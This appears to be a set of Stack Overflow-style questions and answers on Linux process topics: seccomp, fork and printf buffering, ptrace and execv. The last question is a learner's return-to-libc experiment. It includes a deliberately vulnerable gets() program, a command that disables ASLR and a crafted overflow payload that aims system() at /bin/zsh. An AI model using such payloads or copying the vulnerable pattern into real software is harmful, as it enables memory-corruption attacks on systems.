Why does a process that has gone into seccomp mode always get killed on exit?
$ cat simple.c
#include <stdio.h>
#include <stdlib.h>
#include <linux/prctl.h>
int main( int argc, char **argv )
{
printf("Starting\n");
prctl(PR_SET_SECCOMP, 1);
printf("Running\n");
exit(0);
}
$ cc -o simple simple.c
$ ./simple || echo "Returned $?"
Starting
Running
Killed
Returned 137
From the man page, under PR_SET_SECCOMP, the only allowed system calls are read, write, exit, and sigreturn.
When you call exit(0) in the standard library (in recent Linux), you call the exit_group system call, not exit. This is not allowed, so you get a SIGKILL.
(You can see this if you strace the process...)
Related
Think of this as a continuation of the good advice here:
https://stackoverflow.com/a/56780616/16739703
except that I am hoping not to modify the child process.
Edit: I have written code which minimises to:
#include <errno.h>
#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[], char *envp[]) {
int init_flags=fcntl(0, F_GETFL, 0);
if (fcntl(0, F_SETFL, init_flags | O_ASYNC)) {
perror("fcntl...F_SET_FL....O_ASYNC");
exit(1);
}
if (fcntl(0, F_SETOWN, getpid())) {
perror("fcntl...F_SETOWN...)");
exit(1);
}
if (execve(argv[1], argv+1, envp)) {
perror("execve");
exit(1);
}
return 1;
}
and this makefile:
all: morehup
CFLAGS=-g -D_GNU_SOURCE
LDFLAGS=-g
so that, with this procedure:
parent> export TMPDIR="$(mktemp -d)"
parent> mkfifo $TMPDIR/fifo
parent> sh
# you get a new shell, probably with a different prompt
parent> exec 7<>$TMPDIR/fifo
# must be both input and output, or the process stalls
child> TMPDIR=... # as other shell
child> ./morehup <$TMPDIR/fifo /bin/sh -c "while true; do date; sleep 5; done"
# you get a list of dates
parent> exit
child> I/O possible # followed by a prompt, with no more dates
the kernel will kill the child when the parent exits.
The more configurable version is here:
https://github.com/JamesC1/morehup/blob/main/morehup.c
I have two questions:
What are the chances of adding modest amounts of code, so that this will mostly work for most of the common *nix?
Is there a posix utility that already does something like this? ie am I reinventing the wheel, and if so, what is it called?
This is my program code:
#include <unistd.h>
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <sys/types.h>
void function() {
srand(time(NULL));
while(1) {
int n = rand();
printf("%d ", n);
//sleep(1);
}
}
int main() {
pid_t pid;
pid = fork();
if (pid == 0) {
function();
}
}
With the sleep line commented out (as in the code above) the program works fine (i.e. it prints a bunch of random numbers too fast to even see if they are actually random), but if I remove the comment the program doesn't print anything and exits (not even the first time, before it gets to the sleep), even though it compiles without warnings or errors with or without the comment.
but if I remove the comment the program doesn't print anything and exits
It does not print, but it does not really exit either. It will still be running a process in the background. And that process runs your infinite while loop.
Using your code in p.c:
$ gcc p.c
$ ./a.out
$ ps -A | grep a.out
267282 pts/0 00:00:00 a.out
$ killall a.out
$ killall a.out
a.out: no process found
The problem is that printf does not really print. It only sends data to the output buffer. In order to force the output buffer to be printed, invoke fflush(stdout)
If you're not flushing, then you just rely on the behavior of the terminal you're using. It's very common for terminals to flush when you write a newline character to the output stream. That's one reason why it's preferable to use printf("data\n") instead of printf("\ndata"). See this question for more info: https://softwareengineering.stackexchange.com/q/381711/283695
I'd suspect that if you just leave your program running, it will eventually print. It makes sense that it has a finite buffer and that it flushes when it gets full. But that's just an (educated) guess, and it depends on your terminal.
it prints a bunch of random numbers too fast to even see if they are actually random
How do you see if a sequence of numbers is random? (Playing the devils advocate)
I believe you need to call fflush(3) from time to time. See also setvbuf(3) and stdio(3) and sysconf(3).
I guess that if you coded:
while(1) {
int n = rand();
printf("%d ", n);
if (n % 4 == 0)
fflush(NULL);
sleep(1);
}
The behavior of your program might be more user friendly. The buffer of stdout might have several dozens of kilobytes at least.
BTW, I could be wrong. Check by reading a recent C draft standard (perhaps n2176).
At the very least, see this C reference website then syscalls(2), fork(2) and sleep(3).
You need to call waitpid(2) or a similar function for every successful fork(2).
If on Linux, read also Advanced Linux Programming and use both strace(1) and gdb(1) to understand the behavior of your program. With GCC don't forget to compile it as gcc -Wall -Wextra -g to get all warnings and debug info.
Consider also using the Clang static analyzer.
I am looking for a ptrace() call to observe a process until the process exits.
I have this which compiles with gcc / cc on OSX:
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <stdio.h>
#include <sys/ptrace.h>
int main(int argc, char *argv[]) {
pid_t pidx = atoi(argv[1]);
printf("pid = %jd\n", (intmax_t) pidx);
ptrace(PT_ATTACHEXC, pidx, 0, 0);
wait(NULL);
}
However, even with a valid/existing pid, this program will still exit immediately. I am trying to only exit this program after pidx dies.
Is this possible somehow?
Ideally I want something that works on both OSX and Linux.
Your problem is probably that the wait call returns immediately, because the traced "inferior" process is suspended, you know, waiting for you to debug it. You're going to need some kind of loop in which you make ptrace requests to inspect the child and then resume execution, and then call wait again to wait for it to suspend on the next breakpoint or whatever. Unfortunately the debugger API is extremely non-portable; you will have to write most of this program twice, once for OSX and once for Linux.
I want to execute a C program in Linux using fork and exec system calls.
I have written a program msg.c and it's working fine. Then I wrote a program msg1.c.
When I do ./a.out msg.c, it's just printing msg.c as output but not executing my program.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> /* for fork */
#include <sys/types.h> /* for pid_t */
#include <sys/wait.h> /* for wait */
int main(int argc,char** argv)
{
/*Spawn a child to run the program.*/
pid_t pid=fork();
if (pid==0)
{ /* child process */
// static char *argv[]={"echo","Foo is my name.",NULL};
execv("/bin/echo",argv);
exit(127); /* only if execv fails */
}
else
{ /* pid!=0; parent process */
waitpid(pid,0,0); /* wait for child to exit */
}
return 0;
}
argv[0] contains your program's name and you are Echo'ing it.
Works flawlessly ;-)
/bin/echo msg.c will print msg.c as output if you need to execute your msg binary then you need to change your code to execv("path/msg");
your exec executes the program echo which prints out whatever argv's value is;
furthermore you cannot "execute" msg.c if it is a sourcefile, you have to compile (gcc msg.c -o msg) it first, and then call something like exec("msg")
C programs are not executables (unless you use an uncommon C interpreter).
You need to compile them first with a compiler like GCC, so compile your msg.c source file into a msg-prog executable (using -Wall to get all warnings and -g to get debugging info from the gcc compiler) with:
gcc -Wall -g msg.c -o msg-prog
Take care to improve the msg.c till you get no warnings.
Then, you might want to replace your execv in your source code with something more sensible. Read execve(2) and execl(3) and perror(3). Consider using
execl ("./msg-prog", "msg-prog", "Foo is my name", NULL);
perror ("execl failed");
exit (127);
Read Advanced Linux Programming.
NB: You might name your executable just msg instead of msg-prog ....
I'd like to learn how return to libc attacks work, so I have written a vulnerable program so that I can change the return address of a function to that of system(). However, the program doesn't appear to call system() and exits cleanly.
Prerequisites
- I'm using Debain Squeeze
- I have disabled address randomization with:
echo 0 > /proc/sys/kernel/randomize_va_space
Vulnerable Code
#include <stdio.h>
void someFunc(void);
void someFunc(void){
char buffer[64];
gets(buffer);
//puts(buffer);
}
int main(int argc, char **argv)
{
someFunc();
return 0;
}
The code is compiled with:
gcc -fno-stack-protector -ggdb -o vuln vuln.c
Using GDB I have asserted that:
/bin/zsh is # 0xbffff9b9
system() is # 0xb7ed0000
exit() is # 0xb7ec60f0
Exploit
I exploit it by piping in 72 zeros, exit, system and the pointer to /bin/zsh, in that order:
printf "%072x\xf0\x60\xec\xb7\x00\x00\xed\xb7\xb9\xf9\xff\xbf" | ./vuln
The program doesn't segfault or execute /bin/zsh.
In GDB
Interestingly, if I change SHELL="/xin/zsh", and execute it in gdb, the system call works:
Cannot exec /xin/zsh
So my questions are:
Have I understood the return to libc attack concept correctly?
Am I piping the malicious code in the correct way and order?
Why does it appear to work in GDB, but not in the shell?
(I've already read return to libc works in gdb but not when running alone)